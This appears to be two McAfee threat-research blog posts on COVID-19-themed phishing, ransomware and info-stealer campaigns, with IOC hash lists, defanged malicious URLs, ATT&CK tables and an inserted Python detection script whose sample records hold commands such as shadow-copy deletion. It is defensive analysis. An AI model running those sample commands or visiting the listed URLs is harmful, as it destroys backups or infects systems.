Scam COVID-19 Tests: In March, cybercriminals distributed phishing emails appearing to originate from organizations offering COVID-19 testing. Users were prompted to open an attached document, which would then download the information stealing Trickbot malware.

Scam Antibody Research & Treatment: By late March, McAfee began to see COVID-19-themed phishing campaigns using a strain of the Emotet Trojan to infect users’ systems. One version of this email promises to provide information on Coronavirus antibody research and new treatments for the disease. Once established on the victim’s system, Emotet can do a number of things, but it is almost always programmed to propagate itself by sending large numbers of spam emails to other users’ systems.

Precautionary Measures: April saw the emergence of phishing email campaigns using subject lines such as “COVID-19 Urgent Precaution Measures” to distribute the NanoCore Remote Access Tool (RAT) for exfiltration of valuable information.

Fake Johns Hopkins Infection Map: April also saw cybercriminals use phishing emails to promote a fake website featuring a global Coronavirus infection map appearing to provide data from Johns Hopkins CSSE. Unfortunately, those same emails were used to infect inquisitive users with a strain of the information-stealing Azorult malware.

Bogus Insurance Invoices: Mid-April also saw cybercriminals use COVID-19-themed emails from a bogus insurance company to infect users’ systems with fake invoice attachments carrying the Hancitor malware.

COVID-19 Ransomware: March saw the emergence of Ransomware-GVZ, a Coronavirus-themed ransomware campaign. Ransomware-GVZ displays a “ransom note” message demanding payment in return for decrypting the victim’s system and the precious personal and corporate data it contains.

By mid-April, another ransomware campaign joined the fray, this time using a strain of Netwalker ransomware to infect users via a malicious file named “CORONAVIRUS_COVID-19.vbs”.

Spam & Scam: Finally, beyond malware, McAfee has detected thousands of COVID-19-themed spam emails and websites scamming victims seeking to purchase medical supplies such as testing kits, face masks, and other protective gear. Over the first 13 weeks of the pandemic, McAfee saw the number of bogus websites increase from 1,600 a few weeks ago to over 39,000.

Takeaways

Cybercriminals will always seek to create ever more sophisticated and opportunistic attacks. Remote work paradigms create new opportunities and require new defense mechanisms and practices. This week’s report illustrates the importance of maintaining strong cybersecurity defenses regardless of whether employees are in traditional office or home-office environments. We must formulate the right combination of technology and education to make that happen.

Organizations need to defend against cyber-threats at home with data protection solutions capable of preventing intellectual property and other forms of sensitive data from being stolen. McAfee is focused on helping address these challenges with its Unified Cloud Edge and CASB solutions that are inherently focused on protecting both mobile and traditional devices from threats and data theft. Additionally, modern endpoint and EDR capabilities are capable of detecting a wide range of threats that place the user and their organization at risk.

The future is uncertain, change and disruption are inevitable, and our adversaries are determined in their drive to exploit us at work, no matter where that may be. We must rise to the challenge of pushing technology forward, adapting, and developing stronger cyber defenses to ensure that the “future of work” is a secure one.

Please see this week’s “COVID-19: Malware Makes Hay During a Pandemic” report for our summary of COVID-19-related McAfee threat research.

The post McAfee Surveys Cyber-Threats in the Age of Coronavirus appeared first on McAfee Blogs.

COVID-19 – Malware Makes Hay During a Pandemic

Special thanks to Prajwala Rao, Oliver Devane, Shannon Cole, Ankit Goel and members of Malware Research for their contribution and monitoring of related threats

As COVID-19 continues to spread across the world, it is no surprise that malware authors are exploiting the pandemic. McAfee recently released blogs around COVID-19 related threats – Staying safe while working remotely, COVID-19 Threat Update Now Includes Blood for Sale and Transitioning to a Mass Remote Workforce. The first discusses how attackers would like to leverage this pandemic as an opportunity to attack organizations; the second gives a preview of attackers playing on the fears of the general public grappling to get hold of a cure, manage this illness and stay safe; the third gives some direction to organizations on how to verify their security controls. In this blog we continue to discuss COVID-19 themed attacks and how to stay vigilant.

The weeks of quarantine have forced individuals and organizations to quickly adapt to a work from home model. A lot more time is spent indoors and online and there continues to be anxiety around when normalcy will be restored. For now, we continue to deal with a barrage of news articles around the pandemic, managing supply and demand of household goods in stores and online, and a shortage of medical supplies such as preventative masks, gloves and sanitizer. These are trying times for us and a feast for fear mongering malware criminals.

Over the last few months of 2020, McAfee researchers have been hard at work keeping our customers safe through more directed monitoring and by adapting our detection stack to better manage the COVID-19 threat landscape. This is not intended to be an exhaustive report, given the scope of a continually evolving COVID-19 landscape; instead, we cover a subset of threats across malware, spam and malicious/scam URL campaigns.

This blog serves to remind customers to utilize the various levers present in our endpoint product and our expanded portfolio such as McAfee’s Unified Cloud Edge. Please read our recommendation section and view our IOC section (a partial IOC list based on this article) and expert rules section (covering a few tactics based on this article). McAfee utilizes several internal and external sourcing techniques for malware harvesting, including collaboration with other industry partners as part of the Cyber Threat Alliance.

Timeline

The timeline below shows a subset of prevalent malware families observed in our spam traps with references to COVID-19/Coronavirus. The families shown in this timeline have been chosen for their capacity for damage (such as ransomware) or their ability to propagate (Emotet for spam, or other worm-like activity).

The weekly distribution of all known COVID-related IOCs is shown below.

Malware

This section covers a subset of the Malware families included in the timeline above and shows the various IOCs that referenced the virus. For a more comprehensive list of IOCs please refer to the IOC section.

Ursnif

The first threat we observed taking advantage of the pandemic was Ursnif. Ursnif is a banking Trojan that aims to steal banking credentials and has been evolving to become more powerful. Ursnif collects the victim’s system activity, records keystrokes, and keeps track of network traffic and browser activity.

We have observed Ursnif using COVID-19 filenames to entice users since January 2020.

On executing the VBS file, it drops a DLL at C:\Programdata\FxrPLxT.dll and executes the DLL with rundll32.exe. The DLL is injected into iexplorer.exe and communicates with its C&C server using HTTP GET requests.

IOCs

Type IOC Comment
Sha256 e82d49c11057f5c222a440f05daf9a53e860455dc01b141e072de525c2c74fb3 Filename: Coronavirus_disease_COVID-19__194778526200471.vbs
Sha256 8bcdf1fbc8cee1058ccb5510df49b268dbfce541cfc4c83e135b41e7dd150e8d Ursnif dll

 

MITRE ATT&CK™ MATRIX:

Technique ID Tactic Technique details
T1059 Execution Command-Line Interface
T1129 Execution Execution through Module Load
T1085 Defense Evasion, Execution Rundll32
T1060 Persistence Registry Run Keys / Startup Folder
T1055 Defense Evasion, Privilege Escalation Process Injection

 

Fareit

Fareit is an information stealer that steals data from web browsers, FTP programs, email clients and over a hundred different software tools installed on the infected machine. We have observed several Fareit phishing emails with the COVID/Coronavirus name. A few of them are shown below.

Fareit Spam 1:

IOCs

Type IOC Comment
Sha256 da1443a25f433e23a43d35d50328a4f935d3cce840f1e3cca99b6bd6d49ed6a7 Dropped Binary
Sha256 9f4bb022b49bd6ba0766e9408139648d2ddfe2f0dd5ca14644e5bdb2982b5e40 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1106 Execution Execution through API
T1130 Defense Evasion Install Root Certificate
T1081 Credential Access Credentials in Files
T1012 Discovery Query Registry

 

Fareit Spam 2:

IOCs

Type IOC Comment
Sha256  2faf0ef9901b80a05ed77fc20b55e89dc0e1a23ae86dc19966881a00704e5846 Attachment
Sha256 38a511b9224705bfea131c1f77b3bb233478e2a1d9bd3bf99a7933dbe11dbe3c Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1106 Execution Execution through API
T1130 Defense Evasion Install Root Certificate
T1081 Credential Access Credentials in Files
T1012 Discovery Query Registry
T1071 C & C Standard Application Layer Protocol

 

Fareit Spam 3:

IOCs

Type IOC Comment
Sha256 11a834cda4a55c8adb663fbcdd4b1f1018715dd737d3089a731b9840b77e5e76 Dropped Binary
Sha256 45c6440bdd7b49023bb42f9661caae3b12b579dfd5ae9e64421923ef452a0faf Email
Sha256 095bfab52666648ff4d2636a3718a28eab4d99a6c178a8c7912197221dd1d195 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1106, T1204 Execution Execution through API, User Execution
T1060 Persistence Registry Run Keys / Startup Folder
T1130 Defense Evasion Install Root Certificate
T1081 Credential Access Credentials in Files
T1012 Discovery Query Registry
T1114 Collection Email Collection

 

Fareit Spam 4:

IOCs

Type IOC Comment
Sha256 f8e041bed93783bbd5966bfba6273fe7183464035ea54fe1d59ff85a679b3e3e Dropped Binary
Sha256 9e17f5e70c30ead347b68841fa137015d713269add98f0257fb30cc6afdea4fe Attachment
Sha256 ada05f3f0a00dd2acac91e24eb46a1e719fb08838145d9ae7209b5b7bba52c67 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1204 Execution User Execution
T1071 Command and Control Standard Application layer Protocol

 

COVID-19 Ransomware

It was no surprise that a new ransomware family appeared on the scene. Once executed, Ransomware-GVZ deletes shadow copies with vssadmin and then proceeds to encrypt all non-PE file types. Once a whole folder has been encrypted, the ransom note file below is created.

Ransomware-GVZ will also create a lock screen component so that when the machine is rebooted the following message is displayed.

 

IOCs

Type IOC Comment
Sha256 3299f07bc0711b3587fe8a1c6bf3ee6bcbc14cb775f64b28a61d72ebcb8968d3 Binary

 

MITRE ATT&CK™ MATRIX:

Technique ID Tactic Technique details
T1486 Impact Data Encrypted for Impact
T1083 Discovery File and Directory Discovery
T1490 Impact Inhibit System Recovery

 

Emotet

Emotet is another prevalent threat distributed via phishing emails. We observed the following email being distributed, which, translated to English, reads:

Subject: 

Break !!! COVID-19 solution announced by WHO at the end How a total control method is discovered

Email Body:  

As published in the newsletter of the World Health Organization 3/17/2020 7:40:21 a.m. A new collaborative study identified and studied antibodies to the COVID-19 virus which could be used to design effective universal therapies against many different species of COVID-19 viruses. The results have recently been published in Nature Microbiology.

These are based on natural activities and how heat helped inhibit the virus from growing.

The COVID-19 virus causes a serious disease with high mortality badgers in humans. Several strategies have been developed to treat COVID-19 virus infection, including ZMapp, which has proven effective in non-human primates and has been used below compassionate treatment protocols in humans …

 

Please download the full text in the attached document …

Also share with all contacts to ensure quick epidermal control.

The email contains a zipped Emotet executable which, once executed, uses the process hollowing technique to inject into regasm.exe. It then contacts its C&C server and begins to send spam email.

IOCs

Type IOC Comment
Sha256 ca70837758e2d70a91fae20396dfd80f93597d4e606758a02642ac784324eee6 Attachment
Sha256 702feb680c17b00111c037191f51b9dad1b55db006d9337e883ca48a839e8775 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Tactic Technique details
T1121 Defense Evasion, Execution Regsvcs/Regasm
T1093 Defense Evasion Process Hollowing

Azorult

Azorult is malware that steals data from the victim’s machine, including usernames, passwords, cryptocurrencies, browsing history and cookies. It can also download additional malware onto the victim’s machine. What sets Azorult apart from the other malware described in this report is that its creators set up a fake Coronavirus infection map website (corona-virus-map[.]com). The fake website appears as below:

IOCs

Type IOC Comment
Sha256 c40a712cf1eec59efac42daada5d79c7c3a1e8ed5fbb9315bfb26b58c79bb7a2 Jar file from domain
URL H**p://corona-virus-map.net/map.jar
Sha256 63fcf6b19ac3a6a232075f65b4b58d69cfd4e7f396f573d4da46aaf210f82564 Dropped Binary

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1059 Execution Command-Line Interface
T1012 Discovery Query Registry

 

NetWalker

Another Ransomware which has leveraged COVID-19 is Netwalker. The Ransomware used the filename “CORONAVIRUS_COVID-19.vbs” to trick users into executing it. The VBS file contained the embedded Ransomware payload.

On execution of the VBScript, the ransomware is dropped at “C:\Users\<UserName>\AppData\Local\Temp\qeSw.exe” and executed.

It deletes the shadow copies from the machine with vssadmin.exe to make file recovery more difficult.

The obfuscated VBScript is shown below.

The ransomware iterates through the folders of the infected machine and encrypts the files. Once encrypted the file extension is changed to <filename>.1fd385. A ransom note is also dropped in each folder where files were encrypted. This note is shown below.

IOCs

Type IOC Comment
Sha256 9f9027b5db5c408ee43ef2a7c7dd1aecbdb244ef6b16d9aafb599e8c40368967 CORONAVIRUS_COVID-19.vbs
Sha256 8639825230d5504fd8126ed55b2d7aeb72944ffe17e762801aab8d4f8f880160 Dropped Binary

 

MITRE ATT&CK™ MATRIX:

Technique ID Tactic Technique details
T1204 Execution User Execution
T1064 Execution Scripting
T1106 Execution Execution through API
T1490 Impact Inhibit System Recovery
T1486 Impact Data Encrypted for Impact

 

 

Nanocore RAT

NanoCore is a Remote Access Trojan (RAT) whose highly customizable plugins allow attackers to tailor its functionality to their needs. This RAT has also been found using COVID-19 to distribute itself, with email subjects such as “Covid-19 Urgent Precaution Measures”.

IOCs

Type IOC Comment
Sha256 ca93f60e6d39a91381b26c1dd4d81b7e352aa3712a965a15f0d5eddb565a4730 Dropped Binary
Sha256 89b2324756b04df27036c59d7aaaeef384c5bfc98ec7141ce01a1309129cdf9f Iso Attachment
Sha256 4b523168b86eafe41acf65834c1287677e15fd04f77fea3d0b662183ecee8fd0 Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1193 Initial Access Spear phishing Attachment
T1053 Execution Scheduled Task
T1060 Persistence Registry Run Keys / Startup Folder
T1143 Defense Evasion Hidden Window
T1036 Defense Evasion Masquerading
T1497 Defense Evasion Virtualization/Sandbox Evasion
T1012 Discovery Query Registry
T1124 Discovery System Time Discovery
T1065 Command and Control Uncommonly Used Port

 

 

Hancitor

The Hancitor trojan has also used COVID-19 themes to spread itself, posing as an email from an insurance company. The email contains a link to download a fake invoice, which downloads a VBS file.

On executing the VBS, the Hancitor DLL temp_adobe_123452643.txt is created in the %AppData/Local/Temp folder. The DLL is executed using Regsvr32.exe and then begins to communicate with its C&C.

IOCs

Type IOC Comment
Sha256 2f87dd075fc12c2b6b15a1eb5ca209ba056bb6aa2feaf3518163192a17a7a3 Downloaded Binary
Sha256 0caef2718bc7130314b7f08559beba53ccf00e5ee5aba49523fb83e1d6a2a347 Downloaded Binary
Sha256 375d196227d62a95f82cf9c20657449ebea1b512d4cb19cdfe9eb8f102dd9fa Downloaded Binary
Sha256 0b8800734669aa7dbc6e67f93e268d827b5e67d4f30e33734169ddc93a026 Downloaded Binary
Sha256 9c40426f157a4b684047a428428f882618d07dc5154cf1bf89da5875a00d69c Email

 

MITRE ATT&CK™ MATRIX:

Technique ID Technique Technique details
T1192 Initial Access Spear phishing Link
T1064 Execution Scripting
T1117 Execution Regsvr32
T1071 Command and Control Standard Application Layer Protocol
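The execution chains described above for Ursnif (rundll32 on a DLL dropped under ProgramData), Ransomware-GVZ and NetWalker (vssadmin shadow copy deletion, a VBS dropping qeSw.exe into the user Temp folder) and Hancitor (regsvr32 on a .txt file in Temp) translate directly into process-creation detections. The following is an added example, not McAfee code or a product rule: Python rules run over constructed Sysmon-style records (Image, CommandLine, ParentImage). The user name, the DLL export name and the command-line flags in the samples are assumptions; the file names and paths are the ones the post reports.

```python
"""Flag process-creation telemetry matching the execution chains the post
describes: Ursnif (rundll32 on a DLL under ProgramData), Ransomware-GVZ and
NetWalker (vssadmin shadow deletion, VBS dropping qeSw.exe into Temp) and
Hancitor (regsvr32 on a .txt in Temp). Added example, not McAfee code; the
records are constructed to mirror Sysmon Event ID 1 fields."""

TEMP = "\\appdata\\local\\temp\\"      # %LocalAppData%\Temp, lower-cased
PROGRAMDATA = "\\programdata\\"


def _norm(rec):
    # Windows paths are case-insensitive, so match on lower-cased copies.
    return {k: rec[k].lower() for k in ("Image", "CommandLine", "ParentImage")}


def _vssadmin_delete(r):
    # T1490: vssadmin deleting shadow copies (GVZ and NetWalker both do this)
    return (r["Image"].endswith("\\vssadmin.exe")
            and "delete" in r["CommandLine"] and "shadows" in r["CommandLine"])


def _rundll32_userwritable(r):
    # T1085: rundll32 given a DLL under ProgramData or a user Temp folder (Ursnif)
    cmd = r["CommandLine"]
    return r["Image"].endswith("\\rundll32.exe") and (PROGRAMDATA in cmd or TEMP in cmd)


def _regsvr32_temp(r):
    # T1117: regsvr32 loading a file from Temp; Hancitor's payload is a .txt, not a .dll
    return r["Image"].endswith("\\regsvr32.exe") and TEMP in r["CommandLine"]


def _script_drops_exe(r):
    # T1064: a Windows Script Host process launching an .exe out of Temp (NetWalker qeSw.exe)
    return (r["ParentImage"].endswith(("\\wscript.exe", "\\cscript.exe"))
            and TEMP in r["Image"] and r["Image"].endswith(".exe"))


RULES = [
    ("T1490", "Inhibit System Recovery: vssadmin shadow copy deletion", _vssadmin_delete),
    ("T1085", "Rundll32 loading a DLL from a user-writable path", _rundll32_userwritable),
    ("T1117", "Regsvr32 executing a file from the user Temp folder", _regsvr32_temp),
    ("T1064", "Scripting: WSH spawning an executable from the user Temp folder", _script_drops_exe),
]


def check(record):
    """Return the technique IDs whose rule matches one process-creation record."""
    r = _norm(record)
    return [tid for tid, _desc, pred in RULES if pred(r)]


def scan(records):
    """Map record index -> matched technique IDs, omitting clean records."""
    hits = {}
    for i, rec in enumerate(records):
        ids = check(rec)
        if ids:
            hits[i] = ids
    return hits


# Constructed sample telemetry. The user name "bob", the export "EntryPoint"
# and the vssadmin/regsvr32 flags are placeholders; file names and paths are
# the ones reported in the post.
SAMPLE = [
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\qeSw.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\ProgramData\FxrPLxT.dll,EntryPoint",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Users\bob\AppData\Local\Temp\temp_adobe_123452643.txt"',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\qeSw.exe",
     "CommandLine": r"C:\Users\bob\AppData\Local\Temp\qeSw.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    # Benign lookalikes that must not fire
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe list shadows",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\ole32.dll",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]

if __name__ == "__main__":
    for i, ids in scan(SAMPLE).items():
        print(i, SAMPLE[i]["CommandLine"], "->", ids)
```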

 

Heat Map

This detection heat map shows a snapshot of the various countries where McAfee has observed a detection for known IOCs since mid-January. We have observed detections in almost all the countries impacted by the COVID-19 pandemic.

Spam

There have been thousands of COVID-19-themed spam emails sent daily. They range from medical supply scams to extortion. Below are a few examples of the ones we have observed.

URL

We have observed the number of malicious URLs with references to COVID-19 and Coronavirus spike in the last few weeks. The numbers increased from 1,600 a few weeks ago to over 39,000 in week 13. This highlights the importance of being vigilant when clicking on links and accessing websites, as the number of malicious sites is increasing exponentially.

Here are examples of malicious websites we have observed. False advertising is a common practice during such pandemics. At the time of this writing, there aren’t any quick testing kits available. Also, testing is initiated by health care providers, so it is important to educate yourself and others around you not to buy into scams.

The following is an example of a fake website which offers Coronavirus testing services.

Face masks have been in high demand and in many places have run out. Additionally, there has been a shortage of masks even within the health care community. At times of panic and shortage, it is common for spammers to send out links to fake sites claiming to have medical supplies and equipment. Here is a screenshot of a fake online shop selling face masks.

GTI provides categorization and classification of links serving malware, phishing, scamming etc. McAfee products leverage GTI for URL protection. Also, McAfee’s Unified Cloud Edge provides secure access and expands your capabilities for URL protection.

Read about how one McAfee researcher is giving back by 3D printing masks and shields.

IOCs

Below is a partial list of IOCs we have observed in the field which have taken advantage of the Covid-19 outbreak. The IOCs in this section are a subset of those detected by McAfee’s solutions. We have broader coverage provided by our GTI Cloud, gateway, ATP and other products in our portfolio.

SHA256 39c17475bdb019010453085830e7f8aa1ef41ca182982491306fcf75166b8e08
SHA256 bdcef0f16c70086414ff95b69fdbbe7eb0c9814308d3d60143b6c04dfc077257
SHA256 7a97fc7bdd0ad4ef4453c2e52dd8f44dee9b4e91ff3b5518e311ef1ebac3b667
SHA256 2437ef90b60cf3d6bd0c3eebf3f41ed1e403bc31b024b52b0f41ec648d80a583
SHA256 a537c75de9a95be0c071fd6437cbaf3696752f02c3cd5afa1c9cc47c4c755f75
SHA256 9367f3ea7460ae40ca69d41398327f97136a93656ef5fad1285a0b82f81522a4
SHA256 78cf7ea3c1da98941e164f4ac3f75b57e9bce11467bc5a6c6877846f1adcf150
SHA256 e55efa92d87484cf6b251f2302a0c0c7650acd7ea658bf9997bf761b64fe472a
SHA256 51f0e9b151bde97ebeb813d6eed8a11f02551a6530049f53dc29fc1a20b6699d
SHA256 e382ee1ce9d99f4e8e18833bac121c14ee2e5dc29a8b5382ca5b4eda9db7f1aa
SHA256 e250d977e47e7809086dd35a2767f9ef557591dd00e9ce96ef4071e4f0d8c670
SHA256 50a3bea4b9686bcf5cac144d4fc18aa178f66c8368205f9065cd1d9a2c41f026
SHA256 722a60dfd59a595daa487f2fb759ef6f9ccaabcdf20605d5ae9450cba4a9b9b2
SHA256 1c3532d143212078e204d0f81a782deacd58e8f0e7253472e0509491fd1e5201
SHA256 980de93ad93ecaabc048c9fcc9d62e43eeb32f216c4177963cf1bd94ad53074b
SHA256 a286e3be694b9525530ec6a65b71a8a91e04042c3471e8a9e440f503fe8ce995
SHA256 dbcef5c217a027b8e29b1b750c42a066650820a129543f19364bcb64ac83bc07
SHA256 80f8877406e899c6274331aa991b8d1f4f087e3233c36d39fbaebb729c294899
SHA256 32753598f94412fe3dc382dc12dcf2edf7881d9f07814c82aeec36481b9362b5
SHA256 0fdc97da1c297e6fef93910008fc5c47cbdcd3e2987bc163467b34f56de112ff
SHA256 501cc107e410b245d1b95b64ae0afdae758375b4b3724acfda44041bad963232
SHA256 31cb82cd750af6af9ecf369fd26d47dc913f6b56be6ea12b10fe6dd90ef1b5df
SHA256 da87521ecc146a92a7460a81ebb5ca286450f94c8c9af2a4b3c6c8a180d421c5
SHA256 2bcd35bfb7e4dbdbbf64fce5011199947794425093be7bc74829bfeadb89f0a3
SHA256 90c3d8d13ea151bce21a1f4b842d0ed4eaff09842b23311b2326cf63957fc2b2
SHA256 257afe9f4d7b282b1c0b2f3ebb7e1e80e96c8e0214f1b80ea2b7b636a4e7747d
SHA256 587840d28f2585dd5207731d7fda86a0966c82fa592a26f9148b2de45526db55
SHA256 80ee20c604d5d4b51a30dc21da271651f3c085c40281e3ff3e2ee0175d2ca98d
SHA256 11b4519b76957b0758381f8e19c5e15d8744f7974716642aeb586c615dde38fa
SHA256 6c34cca35d98e464c2f74abd9be670c7f8f707f37cd3f0fd4746c49f8fcf6b07
SHA256 0a8aa3f413a8989bb89599dfc2404f7d34dfbb2e3ce26e900d228e9e8c8908b8
SHA256 c57fa2a5d1a65a687f309f23ca3cfc6721d382b06cf894ee5cd01931bbc17a46
SHA256 9f27a826b4b873c9ea23e023f54d5291a50004d67dd5fe64d1f8c8e8b51b74e3
SHA256 2037c7cc809ed3eddd1338d2bec6266cdb449dbf8ff3510fd360a08d229d4f40
SHA256 8f91d27d3a59c08ab4c453b2679f4620696ba67c56280a4c3757368acb20aad3
SHA256 e8221acccdb8381b5da25a1f61f49dda86b861b52fafe54629396ed1e3346282
SHA256 dc66811ce189240c510733be9e1a2175079dddb80ebf02faaa044fce1f7134d0
SHA256 5b7db5046ba22a6242d5ff6e8f538ad43bba53810117d5eb8f023215aad26e6b
SHA256 f6879431b901df789082452c1c4ffa29e857d247886e421df6dda5fb3d81ca5e
SHA256 4a272dd4a5c6261e983d667dd676875054dd4a4ea11620f16c553fcfd2c44861
SHA256 cc2507ddd53a6f00265f3be51d7217def786914bd1d700ec3c74a2a7107b3476
SHA256 9e4cb963e509fbde6de003a81a3e19cfc703be1c41d20f4b094a0fa89d6ad02c
SHA256 b14d70827d5d668aeb31e94be512fea9fb38ead8ec12cdf7617616801c76b6e9
SHA256 b49c9eba58537f8d856daded80bc9493a83c508d73423b98686d4e8b232d61c3
SHA256 4c9e35f3d5f555dda5f4373cf23fbb289c6067c70841be7022ba6da62e49cccb
SHA256 acec0bb9d9bd199d3e6a77b763cebee8f67275996d3c55af8c617fef76f2e87f
SHA256 c9c0180eba2a712f1aba1303b90cbf12c1117451ce13b68715931abc437b10cd
SHA256 c322d10ef3aa532d4625f1c2589eae0f723208db37a7c7e81e4f07e36c3a537e
SHA256 3c756d761e89a0ea1216e2b7e57250ac76a80d5fe4f072e3b4b372e609ece74e
SHA256 2a42f500d019a64970e1c63d48eefa27727f80fe0a5b13625e0e72a6ec98b968
SHA256 679a8519587909f655bacea438168cbb4c03434aede9913d9a3a637c55a0eae7
SHA256 e9766b6129d9e1d59b92c4313d704e8cdc1a9b38905021efcac334cdd451e617
SHA256 80392bebe21245128e3353eec7f499bdc5550e67501eceebf21985644d146768
SHA256 215c72df44fe8e564d24f4d9930c27409e7f76e2045c67940cdcecdbdbd3b04f
SHA256 9e12094c15f59d68ad17e5ed42ebb85e5b41f4258823b7b5c7472bdff21e6cee
SHA256 1c98a36229b878bae15985c1ae0ff96e42f36fa06359323f205e18431d780a3b
SHA256 e9621840e1bfaf16eaee37e2d1e9d1f0032158a09e638eaebff6d8626d47c95a
SHA256 c51658ed15a09e9d8759c9fbf24665d6f0101a19a2a147e06d58571d05266d0a
SHA256 5187c9a84f5e69ba4b08538c3f5e7432e7b45ac84dec456ea07325ff5e94319a
SHA256 ddb24e0a38ba9194fe299e351e54facb2cca9e6011db2f5242210284df91f900
SHA256 69724a9bd8033bd16647bc9aea41d5fe9fb7f7a83c5d6fbfb439d21b7b9f53f6
SHA256 d7f15f750cceeb9e28e412f278949f183f98aeb65fe99731b2340c8f1c008465
SHA256 238fa49ed966cb746bffee3e7ca95b4a9db3bb0f897b8fd8ae560f9080749a82
SHA256 f92fecc6e4656652d66d1e63f29de8bfc09ea6537cf2c4dd01579dc909ba0113
SHA256 5b12f8d817b5f98eb51ef675d5f31d3d1e34bf06befba424f08a5b28ce98d45a
SHA256 3b701eac4e3a73aec109120c97102c17edf88a20d1883dd5eef6db60d52b8d92
URL https[:]//onedrive[.]live[.]com/download?cid=265DAF943BE0D06F&resid=265DAF943BE0D06F%21171&authkey=AMI1YV6jNxclaec
URL http[:]//popeorigin[.]pw
URL http[:]//dewakartu[.]info/wp-includes/BRVMFYvIR/
URL http[:]//drhuzaifa[.]com/wp-includes/2i48k7-evv28gw-205510/
URL http[:]//dewarejeki[.]info/wp-includes/up58jauc-pum2w-630352/
URL http[:]//rasmus-plius[.]tomasjs[.]com/wp-admin/KfesPCcG/
URL http[:]//easytogets[.]com/xfxvqq/UxbKAbm/
URL https[:]//cloud-security[.]ggpht[.]ml
URL http[:]//secure[.]zenithglobalplc[.]com/assets/plugins/bootstrap-wizard/system_x64[.]exe
URL http[:]//motivation[.]neighboring[.]site/01/index[.]php
URL http[:]//tailuong[.]com[.]vn/[.]xxx/playbook/onelove/fre[.]php
URL https[:]//www[.]onetimeroma[.]com/lost/rockstar[.]php
URL https[:]//www[.]chapeauartgallery[.]com/SUPPORTS/locals[.]php
URL http[:]//www[.]discusshoops[.]com/DISQUS[.]php
URL https[:]//chomyflozy[.]duckdns[.]org
URL http[:]//www[.]slacktracks[.]info/e12/?LJfxZ=hO3hBkxu1F/QQoVtLv3IhDwCcknmtRcJonnhtJ3R0BM0GC3rHSS1kgq0DEskVYHjDJX+/Q==&Vp8h=cz7tTz9p-90h4gt
URL http[:]//www[.]webfeatusa[.]net/e12/?LJfxZ=1CbYOqydIT70m9XPNsNZ3X3NgDEVQnw/rRrz+k+vF8uL+qJ4J3WKysbsjxdZCzgGrC1++w==&Vp8h=cz7tTz9p90h4gt&sql=1
URL http[:]//www[.]makeupprimerspray[.]com/e12/?LJfxZ=NSQopDdawCOOQSyQXUSgSx+w/7t91r6e8z0AUnmVGKAxI+P615MDhQgbvUIoIJuh35rtRQ==&Vp8h=cz7tTz9p90h4gt&sql=1
URL http[:]//mercadosonntag[.]com[.]br/sK2vbV3
URL https[:]//corona-virus-map[.]net/map[.]jar
URL http[:]//corona-virus-map[.]com
URL http[:]//arinnnnnnnn[.]ddns[.]net
URL http[:]//bralibuda[.]com/4/forum.php
URL http[:]//greferezud[.]com/4/forum[.]php
URL http[:]//deraelous[.]com/4/forum[.]php
URL http[:]//bslines[.]xyz/copy/five/fre[.]php
URL https[:]//healing-yui223[.]com/cgi-sys/suspendedpage[.]cgi
URL http[:]//109[.]236[.]109[.]159/vnx8v
URL http[:]//www[.]drhuzaifa[.]com/wp-includes/2i48k7-evv28gw-205510/
URL http[:]//85[.]96[.]49[.]152/6oU9ipBIjTSU1
URL https[:]//urbanandruraldesign[.]com[.]au/cdcgov/files/
URL http[:]//198[.]23[.]200[.]241/~power13/.xoiaspxo/fre.php
URL http[:]//helpvan[.]su/
URL http[:]//erasmus-plius[.]tomasjs[.]com/wp-admin/KfesPCcG/
URL https[:]//share[.]dmca[.]gripe/jUuWPW6ONwL1Wkux[.]bin
URL https[:]//gocycle[.]com[.]au/cdcgov/files/
URL https[:]//onthefx[.]com/cd[.]php
URL http[:]//186[.]10[.]98[.]177/faHtH2y
URL http[:]//easytogets[.]com/xfxvqq/UXbKAbm/
URL http[:]//dw[.]adyboh[.]com
URL http[:]//wy[.]adyboh[.]com
URL http[:]//feb[.]kkooppt[.]com
URL http[:]//compdate[.]my03[.]com
URL http[:]//jocoly[.]esvnpe[.]com
URL http[:]//bmy[.]hqoohoa[.]com
URL http[:]//bur[.]vueleslie[.]com
URL http[:]//wind[.]windmilldrops[.]com
URL http[:]//vahlallha[.]duckdns[.]org
URL http[:]//cloud-security[.]ggpht[.]ml
URL http[:]//kbfvzoboss[.]bid


Recommendation

This section contains recommendations we encourage you to follow. In addition, the following blog provides guidance for organizations with a remote workforce and explains how McAfee Unified Cloud Edge can help.

Software Updates

As with all our publications, we encourage all our customers to keep their McAfee software up to date. This ensures that you have the latest signatures and rules to help protect against threats similar to the ones described in this report.

We also recommend installing the latest OS patches, VPN patches and all other software updates on your machines. In addition, we highly recommend a SASE solution such as McAfee’s Unified Cloud Edge.

Spotting Spam/Phishing emails

